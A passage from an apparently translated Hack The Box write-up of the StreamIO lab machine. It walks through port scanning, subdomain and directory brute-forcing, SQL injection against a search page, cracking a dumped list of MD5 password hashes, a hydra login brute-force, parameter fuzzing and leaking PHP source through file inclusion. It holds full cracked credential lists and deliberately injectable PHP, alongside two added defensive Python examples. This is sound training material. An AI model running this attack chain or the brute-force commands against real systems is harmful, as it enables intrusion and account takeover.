88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
443/tcp   open  https
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49677/tcp open  unknown
49678/tcp open  unknown
49744/tcp open  unknown
52734/tcp open  unknown

Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 3048.36 seconds

Analysis of scan results

From the port scan results this is most likely a domain controller: many of the open ports and services match the profile of a DC, the domain name is exposed, and the OS is most likely Windows Server 2019. Among the attack surfaces, SMB (445), LDAP and the web service get priority. Also, whenever a domain name turns up, write it into the local hosts file first.

Subdomain brute-forcing with wfuzz

To keep the information gathering complete, brute-force subdomains: besides watch there may be other valuable subdomains that nmap did not reveal. wfuzz can do this:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# wfuzz -u https://streamio.htb -H "HOST: FUZZ.streamio.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt      
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://streamio.htb/
Total requests: 4989

=====================================================================
ID           Response   Lines    Word       Chars       Payload      
...
000004427:   404        6 L      24 W       315 Ch      "www.biz - www.biz"                                                                                                             
000004409:   404        6 L      24 W       315 Ch      "mail07 - mail07"                                                                                                               
000004423:   404        6 L      24 W       315 Ch      "samp - samp"                                                                                                                   
000004413:   404        6 L      24 W       315 Ch      "www.money - www.money"                                                                                                         
000004417:   404        6 L      24 W       315 Ch      "author - author"                                                                                                               
000004418:   404        6 L      24 W       315 Ch      "diablo - diablo"                                                                                                               
000004415:   404        6 L      24 W       315 Ch      "sydney - sydney"                                                                                                               
000004420:   404        6 L      24 W       315 Ch      "word - word"                                                                                                                   
000004416:   404        6 L      24 W       315 Ch      "kraken - kraken"                                                                                                               
000004419:   404        6 L      24 W       315 Ch      "wwwww - wwwww"                                                                                                                 
000004412:   404        6 L      24 W       315 Ch      "jg - jg"                                                                                                                       
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 283.9004
Processed Requests: 4456
Filtered Requests: 0
Requests/sec.: 15.69564

No other subdomains were found.

Exploitation

Attempting to enumerate SMB shares

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# smbmap -H 10.129.226.204                                                                  

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)                                

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# smbclient -L //10.129.226.204 -N                     
session setup failed: NT_STATUS_ACCESS_DENIED

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# crackmapexec smb 10.129.226.204            
SMB         10.129.226.204  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)

Although no accessible SMB shares could be obtained, crackmapexec revealed a new hostname, dc.streamio.htb, which is also added to the hosts file.

smbmap is mostly used for probing and scanning, gathering structural information; it is very strong at mapping SMB shares. smbclient is mostly used to interact with the SMB service, browsing and retrieving resources. crackmapexec is the all-round tool and is indispensable for Active Directory assessments; because it works through the standard built-in Active Directory functions and protocols, it tends to slip past some endpoint protection and intrusion detection/prevention products. It also relies on the impacket library and keeps its own database, which can be accessed with the cmedb command, for example:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cmedb                          
cmedb (default)(smb) > help

Documented commands (type help <topic>):
========================================
help

Undocumented commands:
======================
back  creds  exit  export  groups  hosts  import  shares

cmedb (default)(smb) > hosts

+Hosts---+-----------+----------------+----------+----------------+--------------------------+-------+---------+
| HostID | Admins    | IP             | Hostname | Domain         | OS                       | SMBv1 | Signing |
+--------+-----------+----------------+----------+----------------+--------------------------+-------+---------+
| 1      | 0 Cred(s) | 10.129.228.115 | PIVOTAPI | LICORDEBELLOTA | Windows 10.0 Build 17763 | 0     | 1       |
| 2      | 0 Cred(s) | 10.129.207.210 | PIVOTAPI | LICORDEBELLOTA | Windows 10.0 Build 17763 | 0     | 1       |
| 3      | 0 Cred(s) | 10.129.229.178 | PIVOTAPI | LICORDEBELLOTA | Windows 10.0 Build 17763 | 0     | 1       |
| 4      | 1 Cred(s) | 10.129.229.198 | PIVOTAPI | LICORDEBELLOTA | Windows 10.0 Build 17763 | 0     | 1       |
| 5      | 0 Cred(s) | 10.129.226.204 | DC       | STREAMIO       | Windows 10.0 Build 17763 | 0     | 1       |
+--------+-----------+----------------+----------+----------------+--------------------------+-------+---------+

In addition, enum4linux is often used during domain enumeration:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# enum4linux 10.129.226.204 
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Feb 21 14:17:48 2024

 =========================================( Target Information )=========================================

Target ........... 10.129.226.204
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 10.129.226.204 )===========================


[E] Can't find workgroup/domain



 ===============================( Nbtstat Information for 10.129.226.204 )===============================

Looking up status of 10.129.226.204
No reply from 10.129.226.204

 ==================================( Session Check on 10.129.226.204 )==================================


[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.

In summary, attacking the SMB service did not yield much of value.

Attempting to access the web service

Whether accessed by IP, by the main domain or by the subdomain, the page always shows the same default IIS page:
2024-02-21-14-23-57
Viewing the source reveals nothing either, so, as experience suggests, run a directory brute-force to see whether any hidden directories can be used:

Directory brute-forcing

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# gobuster dir -u http://streamio.htb --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://streamio.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================

At the same time the subdomain's directories can be brute-forced in the same way.

Initial look at the site's functionality

Note: the above was over HTTP; check HTTPS as well to see whether it shows the same page. It does not:
2024-02-21-14-34-37
2024-02-21-14-34-56
It is an online movie streaming site. Click roughly through all of the functionality looking for valuable information. Under "about us" there is information about the site's administrators and developers; stay alert to this, since it may well be very valuable, and note it down. The footer also has an email address, which is noted as well:
2024-02-21-14-49-45
The form under "contact us" can be tested for basic XSS:
2024-02-21-14-52-36
The submission goes through, but unless it is reflected XSS, we cannot say there is no XSS until we find the page that displays the stored submission. Set it aside for now.
Looking at the Network tab of the browser console:
2024-02-21-14-56-02
This shows that this IIS instance is configured to support ASP and possibly ASP.NET as well, and it exposes the PHP version. Record this for now, and do not forget ASPX when it comes to exploitation later.
There is also a login form; try SQL injection:
2024-02-21-15-01-24
Neither weak passwords nor registering and then logging in succeed.
Run directory brute-forces against both HTTPS sites as well and leave them running on the side.
Note: there is a certificate problem here:

Error: error on running gobuster: unable to connect to https://streamio.htb/: Get "https://streamio.htb/": tls: failed to verify certificate: x509: certificate has expired or is not yet valid: current time 2024-02-21T15:05:43+08:00 is after 2022-03-24T07:03:28Z

Adding the -k flag resolves it. Then continue exploring the functionality of the watch subdomain:
It only has a subscription form worth trying; entering an email address shows nothing special.
In environments with many assets it is best to cross-check directory brute-forcing with a second tool,
for example feroxbuster:

┌──(root㉿hunter)-[/home/cvestone]                            
└─# feroxbuster -u https://streamio.htb -x php -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -k                                                             
                                                                                                                                                                                                 
 ___  ___  __   __     __      __         __   ___                                                                                                                                               
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__                                                                                                                                                
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___                                                                                                                                               
by Ben "epi" Risher 🤓                 ver: 2.10.1                                                                                                                                               
───────────────────────────┬──────────────────────                                                                                                                                               
 🎯  Target Url            │ https://streamio.htb                                                                                                                                                
 🚀  Threads               │ 50                                                                                                                                                                  
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt                                                                                     
 👌  Status Codes          │ All Status Codes!                                                                                                                                                   
 💥  Timeout (secs)        │ 7                                                                                                                                                                   
 🦡  User-Agent            │ feroxbuster/2.10.1                                                                                                                                                  
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml                                                                                                                                  
 🔎  Extract Links         │ true                                                                                                                                                                
 💲  Extensions            │ [php]                                                                                                                                                               
 🏁  HTTP methods          │ [GET]                                                                                                                                                               
 🔓  Insecure              │ true                                                                                                                                                                
 🔃  Recursion Depth       │ 4                                                                                                                                                                   
───────────────────────────┴──────────────────────                                                                                                                                               
 🏁  Press [ENTER] to use the Scan Management Menu™                                                                                                                                              
──────────────────────────────────────────────────                                                                                                                                               
404      GET       29l       95w     1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter                                                          
301      GET        2l       10w      151c https://streamio.htb/images => https://streamio.htb/images/                                                                                           
301      GET        2l       10w      150c https://streamio.htb/admin => https://streamio.htb/admin/                                                                                             
301      GET        2l       10w      147c https://streamio.htb/js => https://streamio.htb/js/                                                                                                   
301      GET        2l       10w      148c https://streamio.htb/css => https://streamio.htb/css/                                                                                                 
200      GET      231l      571w     7825c https://streamio.htb/about.php                                              
...

Across these directory brute-forces, the valuable findings were the following:

200      GET        2l        6w       58c https://streamio.htb/admin/master.php 
200      GET     7193l    19558w   253905c https://watch.streamio.htb/search.php
200      GET       20l       47w      677c https://watch.streamio.htb/blocked.php
/images               (Status: 301) [Size: 151] [--> https://streamio.htb/images/]                                                                                                                                    
/Images               (Status: 301) [Size: 151] [--> https://streamio.htb/Images/]                                                                                                                                    
/admin                (Status: 301) [Size: 150] [--> https://streamio.htb/admin/]                                                                                                                                     
/css                  (Status: 301) [Size: 148] [--> https://streamio.htb/css/]                                                                                                                                       
/js                   (Status: 301) [Size: 147] [--> https://streamio.htb/js/]                                                                                                                                        
/fonts                (Status: 301) [Size: 150] [--> https://streamio.htb/fonts/]                                                                                                                                     
/IMAGES               (Status: 301) [Size: 151] [--> https://streamio.htb/IMAGES/]                                                                                                                                    
/Fonts                (Status: 301) [Size: 150] [--> https://streamio.htb/Fonts/]                                                                                                                                     
/Admin                (Status: 301) [Size: 150] [--> https://streamio.htb/Admin/]                                                                                                                                     
/*checkout*           (Status: 400) [Size: 3420]                                                                                                                                                                      
/CSS                  (Status: 301) [Size: 148] [--> https://streamio.htb/CSS/]                                                                                                                                       
/JS                   (Status: 301) [Size: 147] [--> https://streamio.htb/JS/]       

Visit a few of the key directories:
2024-02-21-17-15-57
2024-02-21-17-17-05
2024-02-21-17-17-56
2024-02-21-17-18-29
2024-02-21-17-19-14
Many of these key findings were only picked up by feroxbuster, so a single tool is often not enough.
Among them, master.php gives very important information: it says the page can only be reached via an include, which suggests a file inclusion vulnerability. The presence of blocked.php indicates that the backend probably has a WAF, and some generic behaviour is likely to be blocked. The subdomain site exposes a search page, search.php, which clearly interacts with the database, so SQL injection can be tried.

SQL injection

Probing:
2024-02-25-15-12-41
The search supports fuzzy, case-insensitive matching, so the backend SQL statement is probably something like:
SELECT * FROM movies WHERE name LIKE '%[input]%';
Appending some of the special characters used in SQL injection still returns results normally:
2024-02-25-15-22-47
This indicates a SQL injection vulnerability, because normally such input should not be passed into the backend database and execute successfully. Entering some common SQL statements directly gets blocked by the WAF, for example anything containing "all" (it says blocked for 5 minutes, but on this lab machine simply returning to the form page lets you search again).
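As an added example (not from the write-up), the inferred search.php query built two ways against a small in-memory SQLite table standing in for the movies table; the movie rows are constructed, and since the real backend is MSSQL its string concatenation operator is + where SQLite uses ||:

```python
import sqlite3

# Constructed stand-in for the STREAMIO movies table.
MOVIES = [("Avengers", 2012), ("Inception", 2010), ("The Matrix", 1999)]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE movies (name TEXT, year INTEGER)")
    conn.executemany("INSERT INTO movies VALUES (?, ?)", MOVIES)
    return conn


def search_vulnerable(conn, user_input):
    """The query shape inferred in the text: the input is pasted into the SQL
    string, so quotes and wildcards in it become part of the statement."""
    sql = "SELECT name FROM movies WHERE name LIKE '%" + user_input + "%'"
    return [row[0] for row in conn.execute(sql)]


def breaks_query(conn, user_input):
    """True when the input makes the concatenated statement fail to parse,
    which is what the single-quote probe in the text triggers."""
    try:
        search_vulnerable(conn, user_input)
        return False
    except sqlite3.OperationalError:
        return True


def escape_like(s, esc="\\"):
    """Binding the value as a parameter stops it from closing the string
    literal, but LIKE still interprets % and _ inside the bound value;
    escape them so a user cannot widen the match to every row."""
    return s.replace(esc, esc + esc).replace("%", esc + "%").replace("_", esc + "_")


def search_safe(conn, user_input):
    """Hardened form: pattern bound as a parameter, LIKE wildcards escaped."""
    sql = "SELECT name FROM movies WHERE name LIKE ? ESCAPE '\\'"
    pattern = "%" + escape_like(user_input) + "%"
    return [row[0] for row in conn.execute(sql, (pattern,))]


if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, "INCE"))          # fuzzy and case-insensitive, as observed
    print(breaks_query(db, "'"))                   # True: the quote ends the literal early
    print(search_vulnerable(db, "Ince' || 'pt"))  # input evaluated as SQL, still finds Inception
    print(search_safe(db, "Ince' || 'pt"))        # []: the same text is treated as data
    print(search_safe(db, "%"))                    # []: escaped wildcard no longer matches everything
```

The last two calls are the check worth keeping in a regression test: the same inputs that alter the concatenated query return nothing against the parameterised one.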
Start the standard SQL injection workflow:
2024-02-25-15-39-23
With the injection point found, try to get more data:
Version information:
2024-02-25-15-43-05
Enumerate the databases:
2024-02-25-15-45-33
The current database is clearly STREAMIO; note also streamio_backup, which is important. Both databases are likely to hold credential information usable for credential stuffing.
Inspect the current database:
2024-02-25-15-53-52
Get the names and identifiers of all user tables in the current database:
2024-02-25-16-16-01
Note the two corresponding IDs and continue by getting the matching column names:
2024-02-25-16-22-32
Get the key credentials:
2024-02-25-16-26-42
Extract all the credentials and process the data:
First copy the HTML of the div that contains all the credentials:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# head -n 20 creds_in_html.txt 
                <div class="d-flex movie align-items-end">
                                <div class="mr-auto p-2">
                                        <h5 class="p-2">admin                                             :665a50ac9eaa781e4f7f04199db97a11                  </h5>
                                </div>
                                <div class="ms-auto p-2">
                                        <span class="">3</span>
                                        <button class="btn btn-dark" onclick="unavailable();">Watch</button>
                                </div>
                        </div><div class="d-flex movie align-items-end">
                                <div class="mr-auto p-2">
                                        <h5 class="p-2">Alexendra                                         :1c2b3d8270321140e5153f6637d3ee53                  </h5>
                                </div>
                                <div class="ms-auto p-2">
                                        <span class="">3</span>
                                        <button class="btn btn-dark" onclick="unavailable();">Watch</button>
                                </div>
                        </div><div class="d-flex movie align-items-end">
                                <div class="mr-auto p-2">
                                        <h5 class="p-2">Austin                                            :0049ac57646627b8d7aeaccf8b6a936f                  </h5>
                                </div>

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# grep h5 creds_in_html.txt | sed -e 's/<h5 class="p-2">//g' -e 's/<\/h5>//g' | tr -d " \t" | tee creds.txt
admin:665a50ac9eaa781e4f7f04199db97a11
Alexendra:1c2b3d8270321140e5153f6637d3ee53
Austin:0049ac57646627b8d7aeaccf8b6a936f
Barbra:3961548825e3e21df5646cafe11c6c76
Barry:54c88b2dbd7b1a84012fabc1a4c73415
Baxter:22ee218331afd081b0dcd8115284bae3
Bruno:2a4e2cf22dd8fcb45adcb91be1e22ae8
Carmon:35394484d89fcfdb3c5e447fe749d213
Clara:ef8f3d30a856cf166fb8215aca93e9ff
Diablo:ec33265e5fc8c2f1b0c137bb7b3632b5
Garfield:8097cedd612cc37c29db152b6e9edbd3
Gloria:0cfaaaafb559f081df2befbe66686de0
James:c660060492d9edcaa8332d89c99c9239
Juliette:6dcd87740abb64edfa36d170f0d5450d
Lauren:08344b85b329d7efd611b7a7743e8a09
Lenord:ee0b8a0937abd60c2882eacb2f8dc49f
Lucifer:7df45a9e3de3863807c026ba48e55fb3
Michelle:b83439b16f844bd6ffe35c02fe21b3c0
Oliver:fd78db29173a5cf701bd69027cb9bf6b
Robert:f03b910e2bd0313a23fdd7575f34a694
Robin:dc332fb5576e9631c9dae83f194f8e70
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5
Samantha:083ffae904143c4796e464dac33c1f7d
Stan:384463526d288edcc95fc3701e523bc7
Thane:3577c47eb1e12c8ba021611e1280753c
Theodore:925e5408ecb67aea449373d668b7359e
Victor:bf55e15b119860a6e6b5a164377da719
Victoria:b22abb47a02b52d5dfa27fb0b534f693
William:d62be0dc82071bccc1322d64ec5b6c51
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332
Cracking the credential hashes

Copy any one of the hash values and identify the hash type:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# hash-identifier 3961548825e3e21df5646cafe11c6c76
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
...

It is identified as MD5, so start cracking:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# hashcat creds.txt /usr/share/wordlists/rockyou.txt --user -m 0
hashcat (v6.2.6) starting
...
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# hashcat creds.txt /usr/share/wordlists/rockyou.txt --user -m 0 --show
admin:665a50ac9eaa781e4f7f04199db97a11:paddpadd
Barry:54c88b2dbd7b1a84012fabc1a4c73415:$hadoW
Bruno:2a4e2cf22dd8fcb45adcb91be1e22ae8:$monique$1991$
Clara:ef8f3d30a856cf166fb8215aca93e9ff:%$clara
Juliette:6dcd87740abb64edfa36d170f0d5450d:$3xybitch
Lauren:08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123##
Lenord:ee0b8a0937abd60c2882eacb2f8dc49f:physics69i
Michelle:b83439b16f844bd6ffe35c02fe21b3c0:!?Love?!123
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$
Thane:3577c47eb1e12c8ba021611e1280753c:highschoolmusical
Victoria:b22abb47a02b52d5dfa27fb0b534f693:!5psycho8!
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
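As an added example (not from the write-up), a small parser for the leaked <h5> rows shown above that copes with usernames containing spaces (the grep/sed/tr pipeline would squash them), plus an audit that flags accounts whose stored hash is the unsalted MD5 of a wordlist entry, which is what the hashcat run above did; the HTML sample is copied from the page, while the wordlist and the "demo" rows are constructed:

```python
import hashlib
import re

# Fragment copied from the page's creds_in_html.txt (two rows are enough).
LEAKED_HTML = """
<div class="d-flex movie align-items-end">
    <div class="mr-auto p-2">
        <h5 class="p-2">admin                                             :665a50ac9eaa781e4f7f04199db97a11                  </h5>
    </div>
</div><div class="d-flex movie align-items-end">
    <div class="mr-auto p-2">
        <h5 class="p-2">Alexendra                                         :1c2b3d8270321140e5153f6637d3ee53                  </h5>
    </div>
</div>
"""

# Username: everything up to the colon, trimmed; hash: exactly 32 hex digits.
ROW_RE = re.compile(r'<h5 class="p-2">\s*(.*?)\s*:\s*([0-9a-fA-F]{32})\s*</h5>', re.S)


def md5_hex(password):
    return hashlib.md5(password.encode()).hexdigest()


def parse_rows(html):
    """Return [(username, hash)] in page order, hashes lower-cased."""
    return [(m.group(1), m.group(2).lower()) for m in ROW_RE.finditer(html)]


def weak_accounts(rows, wordlist):
    """Accounts whose stored hash equals md5(word) for some wordlist entry.
    One hash per word covers every account at once: no salt and no cost
    factor is why the whole dump above fell to a wordlist in seconds."""
    lookup = {md5_hex(w): w for w in wordlist}
    return {user: lookup[h] for user, h in rows if h in lookup}


# Constructed rows with known passwords, to show the audit catching one.
DEMO_ROWS = [
    ("demo admin", md5_hex("winter2024")),
    ("demo user", md5_hex("correct horse battery staple")),
]
DEMO_WORDLIST = ["letmein", "winter2024", "password1"]

if __name__ == "__main__":
    for user, h in parse_rows(LEAKED_HTML):
        print(f"{user}:{h}")
    print(weak_accounts(DEMO_ROWS, DEMO_WORDLIST))  # {'demo admin': 'winter2024'}
```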

Save these as a new credential file, then store the usernames and the passwords in separate files:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat cracked_creds.txt | cut -d: -f1 > user
                                  
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat cracked_creds.txt | cut -d: -f3 > pass

Trying the credentials against SMB

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# crackmapexec smb streamio.htb -u user -p pass --continue-on-success
...
impacket.smb3.SessionError: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.) 
...

Clearly these credentials do not give access to SMB shares. Since the system-level connection fails, try the web level, because there was also a login page earlier:

Brute-forcing the web login

Since the hashes are no longer needed after cracking, process the data once more:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat cracked_creds.txt | cut -d: -f1,3 | tee userpass  
admin:paddpadd
Barry:$hadoW
Bruno:$monique$1991$
Clara:%$clara
Juliette:$3xybitch
Lauren:##123a8j8w5123##
Lenord:physics69i
Michelle:!?Love?!123
Sabrina:!!sabrina$
Thane:highschoolmusical
Victoria:!5psycho8!
yoshihide:66boysandgirls..

Start the brute-force; before doing so, find out the form field names and the keyword shown on the failure page:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# hydra -C userpass streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:failed"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-25 17:09:40
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries, ~1 try per task
[DATA] attacking http-post-forms://streamio.htb:443/login.php:username=^USER^&password=^PASS^:failed
[443][http-post-form] host: streamio.htb   login: yoshihide   password: 66boysandgirls..
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-25 17:09:45

With this credential we log in to the site successfully. It looks no different from before, but trying the admin directory shows that this credential can reach the admin console:
2024-02-25-17-15-11
This page is very bare-bones and clearly not built on a public CMS framework; most likely it was hand-written, which makes vulnerabilities likely. After browsing the admin functions there is nothing of immediate value, but clicking each function changes the URL, with one parameter per function, so hidden parameters may well exist; that is plausible given common developer habits. So we can try fuzzing.

Fuzzing URL parameters

Because the fuzzing is done while logged in, remember to supply the current cookie value:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# wfuzz -u https://streamio.htb/admin/?FUZZ= -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H "cookie: PHPSESSID=pv555d6n9ruo2s7btcml2nli93"
...
000000791:   200        49 L     131 W      1678 Ch     "batchExtend"                                                                                                                
000000790:   200        49 L     131 W      1678 Ch     "batch"                                                                                                                      
000000789:   200        49 L     131 W      1678 Ch     "baslik"                                                                                                                     
000000788:   200        49 L     131 W      1678 Ch     "basket"                                                                                                                     
000000787:   200        49 L     131 W      1678 Ch     "basic"                                                                                                                      
000000786:   200        49 L     131 W      1678 Ch     "baseurl"                                                                                                                    
000000785:   200        49 L     131 W      1678 Ch     "basemodule"   
...
# On the first run, first identify the response length that accounts for most responses so it can be excluded; here it is 1678

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# wfuzz -u https://streamio.htb/admin/?FUZZ= -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H "cookie: PHPSESSID=pv555d6n9ruo2s7btcml2nli93" --hh 1678
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://streamio.htb/admin/?FUZZ=
Total requests: 6453

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                      
=====================================================================

000001575:   200        49 L     137 W      1712 Ch     "debug"                                                                                                                      
000003530:   200        10790 L  25878 W    320235 Ch   "movie"
000005450:   200        398 L    916 W      12484 Ch    "staff"                                                                                                                      
000006133:   200        62 L     160 W      2073 Ch     "user"                                                                                                                       

Total time: 0
Processed Requests: 6453
Filtered Requests: 6449
Requests/sec.: 0

A hidden parameter debug indeed exists; try accessing it:
[Screenshot 2024-02-25-17-32-32]
Apart from a hint there is nothing special, and the page source reveals nothing either. But recall that the hidden file /admin/master.php found during the earlier directory brute-force said it can only be accessed through an include, and here we have a ?debug= parameter. Trying master.php as that parameter's value, i.e. including it, works: the file's content is exactly the collection of the existing functions:
[Screenshot 2024-02-25-17-48-33]
This looks useless at first, but in this situation we can reasonably infer a file inclusion vulnerability. Normally we cannot read the PHP file's source, since it is parsed and executed as soon as it is included or accessed from the browser, but because we are in a debug mode we can use a PHP stream wrapper (pseudo-protocol) to retrieve the PHP source.

Leaking PHP source via the file inclusion vulnerability

We can first use the wrapper to base64-encode the included PHP file, then copy it locally and decode it to read:
[Screenshot 2024-02-25-17-58-17]

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat master_base64 | base64 -d | tee master.php
...
PHP code audit
<h1>Movie managment</h1>
<?php
if(!defined('included'))
	die("Only accessable through includes");
if(isset($_POST['movie_id']))
{
$query = "delete from movies where id = ".$_POST['movie_id'];
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from movies order by movie";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>

<div>
	<div class="form-control" style="height: 3rem;">
		<h4 style="float:left;"><?php echo $row['movie']; ?></h4>
		<div style="float:right;padding-right: 25px;">
			<form method="POST" action="?movie=">
				<input type="hidden" name="movie_id" value="<?php echo $row['id']; ?>">
				<input type="submit" class="btn btn-sm btn-primary" value="Delete">
			</form>
		</div>
	</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>Staff managment</h1>
<?php
if(!defined('included'))
	die("Only accessable through includes");
$query = "select * from users where is_staff = 1 ";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
if(isset($_POST['staff_id']))
{
?>
<div class="alert alert-success"> Message sent to administrator</div>
<?php
}
$query = "select * from users where is_staff = 1";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>

<div>
	<div class="form-control" style="height: 3rem;">
		<h4 style="float:left;"><?php echo $row['username']; ?></h4>
		<div style="float:right;padding-right: 25px;">
			<form method="POST">
				<input type="hidden" name="staff_id" value="<?php echo $row['id']; ?>">
				<input type="submit" class="btn btn-sm btn-primary" value="Delete">
			</form>
		</div>
	</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>User managment</h1>
<?php
if(!defined('included'))
	die("Only accessable through includes");
if(isset($_POST['user_id']))
{
$query = "delete from users where is_staff = 0 and id = ".$_POST['user_id'];
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from users where is_staff = 0";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>

<div>
	<div class="form-control" style="height: 3rem;">
		<h4 style="float:left;"><?php echo $row['username']; ?></h4>
		<div style="float:right;padding-right: 25px;">
			<form method="POST">
				<input type="hidden" name="user_id" value="<?php echo $row['id']; ?>">
